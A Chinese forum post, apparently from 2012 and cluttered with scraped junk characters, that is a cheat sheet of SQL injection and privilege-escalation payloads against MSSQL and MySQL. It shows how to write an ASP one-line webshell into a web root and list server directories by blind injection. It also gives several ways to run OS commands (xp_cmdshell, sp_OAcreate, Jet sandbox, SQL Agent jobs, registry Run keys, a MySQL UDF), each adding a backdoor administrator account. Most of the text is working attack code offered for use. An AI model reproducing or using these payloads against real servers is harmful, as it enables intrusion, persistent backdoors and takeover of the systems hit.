MSSQL语句导出一句话木马& K& h' i* l9 U1 g8 F7 W! o
首先确定网站的WEB路径
% W1 _) t% s/ |8 E. v2 o4 X;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马/ v% ?) i$ C7 I
4 N5 K3 D# E. k) h ~3 H
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
. d& h. h: P! @//将一句话木马插入表中4 V$ E& C( N6 \) O8 G& E' j& j9 Q
, `' }5 p! g& C
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
/ B& L, D5 k* ?5 o: P# D//导出一个ASP文件
5 f+ V4 r" g t2 {4 f- _0 ^) \6 M2 L! d& D
8 n* d, K9 l- B/ R. Q! V
关于MSSQL列目录+ y0 W( {' z, z& p/ z3 Q
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表) J& P8 o( [* O0 i5 K/ z
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
5 X- f& F& P( N1 @' h3 E# Q" G) D! ]* u! i4 K: A
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
U0 V# R8 T: s, X7 s) T
3 r- G( v C$ GAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段1 `3 P7 |( T" y' [9 P$ N! M. _
5 l- V0 [) y0 H+ J, E1 ZAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
) ?: f% w) b7 M0 z V$ t B) D, p" J7 X G6 v8 [
# c+ h# d( W$ Y7 Q4 \
数据库版本和权限查看
, h" w$ C5 v$ `" K1 d0 f" sand 1=(select @@VERSION) //查看详细的数据库信息.
! d$ d/ P+ J3 A& {and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
8 o9 ^8 r* u( W4 T' cand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
; d1 E9 r' C1 u5 ]1 K; Y' N
& w. } R: n3 G9 ?) ?9 R/ l {9 G6 s- I% N0 n% y3 m3 k' z
1.利用xp_cmdshell执行命令
( b2 f0 |4 Y# n3 z0 i6 Wexec master..xp_cmdshell 'net user rfire 123456 /add', ?* t9 s9 I8 d1 e
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
! O/ R+ z9 l" s7 E/ n# G7 x( A) {- C0 X/ {
恢复xp_cmdshell存储过程- T# P6 P$ e8 K, x; w+ ^
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'- K* V- D6 ?8 [0 B# `4 }
) J2 W+ k5 X% H3 q3 P
! E8 @* L9 z* P: E2.利用SP_OAcreate和SP_OAMETHOD执行命令
+ z3 u( q" ~; N: r( W在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下, t9 `! G$ p( j, N4 {# y
DECLARE @shell INT //建立一个@shell实体
( v& S: r L+ B4 U; }+ X( `) @EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
: Z# ^$ ]# S. b9 f! u$ dEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例' D" R; q" `- h! L8 J: g4 M! s
' x3 O8 m1 ~& w
$ ~% }' q4 l! n; _( h" Z3.利用沙盒模式! M, m/ b5 O- j' c
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。0 j, D+ I$ X% u2 B
开启沙盒模式:+ Q: m* K" O; l0 }7 a9 J& }# ?
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0$ M- t6 _+ J3 H0 j1 g
& W7 ?' N5 k9 z8 N6 a# p w
执行命令:
+ v6 }9 K. }" F% \9 D( o% \5 {Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
u4 m' L. g5 G# Q* R9 J8 @) R0 N1 L0 C0 i
0 C0 |' ]% t$ J; u. h2 n$ q* X! _4.利用SQL代理执行命令8 |+ P5 {( P4 z! a" |; z
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务4 S8 D2 l: k* x+ \# h( u: H" b. Q' A
7 J( m" X% A2 M执行命令:" e S# _( r. Y9 Z) l
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错) j" o) M' r) L: R3 Q3 T& ^
exec sp_add_job 'x'
1 ^ u2 b8 q( z5 b2 G* W6 j: I# f( qexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业. b, ]% p" ^2 i. v p0 D% R* {
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业2 x- A' Y% z% Y# q( J9 [$ ~) K) @" n
! m$ m( U' E, u/ K; D- S
1 p. ^. c6 y5 ]1 q- R( w6 K1 ?5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)6 S5 u) j6 w: p9 f( \
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'8 \8 X8 g3 R& {& n2 O, I6 g
" d6 y9 S/ A( u4 w, R& u9 e Z: D A* a
6.MYSQL的命令执行1 l! T9 x* O F* I! w' Q
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
' [ t" R/ E, ?( p- h( w首先要在su.php下导出c:\windows\udf.dll; d- M/ o/ n. ]& j
导出后执行创建自定义函数命令:
9 j Z; V8 \5 u# P) Z8 |! |$ _+ MCreate Function cmdshell returns string soname 'udf.dll'6 l, u8 E" n$ o* w% G7 p
执行命令
$ ?& {- [/ g; m" M ?( U: W! Pselect cmdshell('net user rfire 123456 /add')
0 k/ n6 P% s& @$ F, F1 K2 H执行后删除函数 drop function cmdshell
1 x+ O! s! k" ^, N; s5 O& W+ _ |
发表于 2012-9-13 17:49:59
收藏
支持
反对